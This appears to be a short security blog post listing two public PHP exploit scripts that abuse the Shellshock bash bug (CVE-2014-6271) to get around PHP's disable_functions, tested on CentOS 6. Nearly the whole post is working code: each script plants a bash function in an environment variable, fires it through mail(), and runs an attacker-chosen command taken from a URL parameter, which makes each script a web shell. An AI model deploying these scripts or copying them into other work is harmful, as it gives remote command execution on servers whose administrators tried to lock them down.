MENU

PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit

November 30, 2014 • Security

测试环境:php 5.3.2 bash 4.1.2 Centos 6

php.ini中存在如下设置:

disable_functions=phpinfo,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

Bypass1

<?php

// Exploit Title: PHP 5.x and GNU Bash <= 4.3 Shellshock Exploit
// Date: 22/11/2014
// Exploit Author: ssbostan
// Vendor Homepage: http://www.gnu.org/software/bash/
// Software Link: http://ftp.gnu.org/gnu/bash/
// Version: <= 4.3
// Tested on: Fedora 17, Ubuntu 8.04
// CVE: http://www.cvedetails.com/cve/CVE-2014-6271/

echo "Disabled functions: ".ini_get('disable_functions')."\n";

if(isset($_GET["cmd"]) && !empty($_GET["cmd"]))
{
$file=tempnam("/tmp", "xpl");
putenv("PHP_XPL=() { :;}; {$_GET["cmd"]}>{$file}");
mail("xpl@localhost", "", "", "", "-bv");
echo '<pre>';
echo file_get_contents($file);
echo '</pre>';
unlink($file);
}

?>

Bypass2

<?php
# Exploit Title: PHP 5.x Shellshock Exploit (bypass disable_functions)
# Google Dork: none
# Date: 10/31/2014
# Exploit Author: Ryan King (Starfall)
# Vendor Homepage: http://php.net
# Software Link: http://php.net/get/php-5.6.2.tar.bz2/from/a/mirror
# Version: 5.* (tested on 5.6.2)
# Tested on: Debian 7 and CentOS 5 and 6
# CVE: CVE-2014-6271

echo "Disabled functions: ".ini_get('disable_functions')."\n";

function shellshock($cmd) { // Execute a command via CVE-2014-6271 @ mail.c:283
   if(strstr(readlink("/bin/sh"), "bash") != FALSE) {
     $tmp = tempnam(".","data");
     putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
     // In Safe Mode, the user may only alter environment variables whose names
     // begin with the prefixes supplied by this directive.
     // By default, users will only be able to set environment variables that
     // begin with PHP_ (e.g. PHP_FOO=BAR). Note: if this directive is empty,
     // PHP will let the user modify ANY environment variable!
     mail("a@127.0.0.1","","","","-bv"); // -bv so we don't actually send any mail
   }
   else return "Not vuln (not bash)";
   $output = @file_get_contents($tmp);
   @unlink($tmp);
   if($output != "") return $output;
   else return "No output, or not vuln.";
}
echo '<pre>';
echo shellshock($_REQUEST["cmd"]);
echo '</pre>';
?>

QQ截图20160809202923.png

Archives QR Code
QR Code for this page
Tipping QR Code